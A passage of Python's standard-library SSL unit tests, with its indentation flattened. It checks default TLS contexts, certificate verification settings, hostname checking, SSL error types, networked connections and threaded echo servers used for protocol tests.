ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
with open(SIGNING_CA) as f:
cadata = f.read().decode("ascii")
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
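# Recap of what is asserted above: create_default_context() always uses
# PROTOCOL_SSLv23 and sets OP_NO_SSLv2; verification defaults to
# CERT_REQUIRED with check_hostname for server auth, but CERT_NONE for
# Purpose.CLIENT_AUTH.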
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test__https_verify_certificates(self):
# Unit test to check the context factory mapping
# The factories themselves are tested above
# This test will fail by design if run under PYTHONHTTPSVERIFY=0
# (as will various test_httplib tests)
# Uses a fresh SSL module to avoid affecting the real one
local_ssl = support.import_fresh_module("ssl")
# Certificate verification is enabled by default
self.assertIs(local_ssl._create_default_https_context,
local_ssl.create_default_context)
# Turn default verification off
local_ssl._https_verify_certificates(enable=False)
self.assertIs(local_ssl._create_default_https_context,
local_ssl._create_unverified_context)
# And back on
local_ssl._https_verify_certificates(enable=True)
self.assertIs(local_ssl._create_default_https_context,
local_ssl.create_default_context)
# The default behaviour is to enable
local_ssl._https_verify_certificates(enable=False)
local_ssl._https_verify_certificates()
self.assertIs(local_ssl._create_default_https_context,
local_ssl.create_default_context)
def test__https_verify_envvar(self):
# Unit test to check the PYTHONHTTPSVERIFY handling
# Need to use a subprocess so it can still be run under -E
https_is_verified = """import ssl, sys; \
status = "Error: _create_default_https_context does not verify certs" \
if ssl._create_default_https_context is \
ssl._create_unverified_context \
else None; \
sys.exit(status)"""
https_is_not_verified = """import ssl, sys; \
status = "Error: _create_default_https_context verifies certs" \
if ssl._create_default_https_context is \
ssl.create_default_context \
else None; \
sys.exit(status)"""
extra_env = {}
# Omitting it leaves verification on
assert_python_ok("-c", https_is_verified, **extra_env)
# Setting it to zero turns verification off
extra_env[ssl._https_verify_envvar] = "0"
assert_python_ok("-c", https_is_not_verified, **extra_env)
# Any other value should also leave it on
for setting in ("", "1", "enabled", "foo"):
extra_env[ssl._https_verify_envvar] = setting
assert_python_ok("-c", https_is_verified, **extra_env)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
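# In short: check_hostname can only be turned on while verify_mode is
# CERT_REQUIRED or CERT_OPTIONAL, and verify_mode cannot drop back to
# CERT_NONE while check_hostname is still enabled.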
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with closing(socket.socket()) as s:
s.bind(("127.0.0.1", 0))
s.listen(5)
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with closing(ctx.wrap_socket(c, False, do_handshake_on_connect=False)) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect((REMOTE_HOST, 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
s.connect((REMOTE_HOST, 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex((REMOTE_HOST, 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex((REMOTE_HOST, 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
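# The loop above is the standard non-blocking handshake pattern: retry
# do_handshake(), waiting for readability on SSLWantReadError and for
# writability on SSLWantWriteError until the handshake completes.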
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
rc = s.connect_ex((REMOTE_HOST, 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet(REMOTE_HOST):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=REMOTE_HOST)
s.connect((REMOTE_HOST, 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(REMOTE_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(REMOTE_ROOT_CERT) as f:
pem = f.read().decode('ascii')
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet(REMOTE_HOST):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect((REMOTE_HOST, 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet(REMOTE_HOST):
s = socket.socket(socket.AF_INET)
s.connect((REMOTE_HOST, 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = (REMOTE_HOST, 443)
with support.transient_internet(remote[0]):
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL")) as s:
s.connect(remote)
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")) as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
with closing(socket.socket(socket.AF_INET)) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet(REMOTE_HOST):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with closing(ctx1.wrap_socket(s)) as ss:
ss.connect((REMOTE_HOST, 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except socket.error as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
if not isinstance(e, ssl.SSLError) and e.errno != errno.ECONNRESET:
raise
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ssl.SSLError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
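# The SSL layer may hold decrypted bytes that select() cannot see on the
# raw fd, so drain pending() data before reporting readable.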
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except socket.error as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accept(self):
sock_obj, addr = self.accept()
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with closing(client_context.wrap_socket(socket.socket(),
server_hostname=sni_name)) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
return stats
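# The stats dict collected here (cipher, compression, peer cert, ALPN/NPN
# selections and TLS version) is returned to the caller; try_protocol_combo()
# below inspects stats['version'] when expect_success names a specific
# protocol version.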
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except socket.error as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raises ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
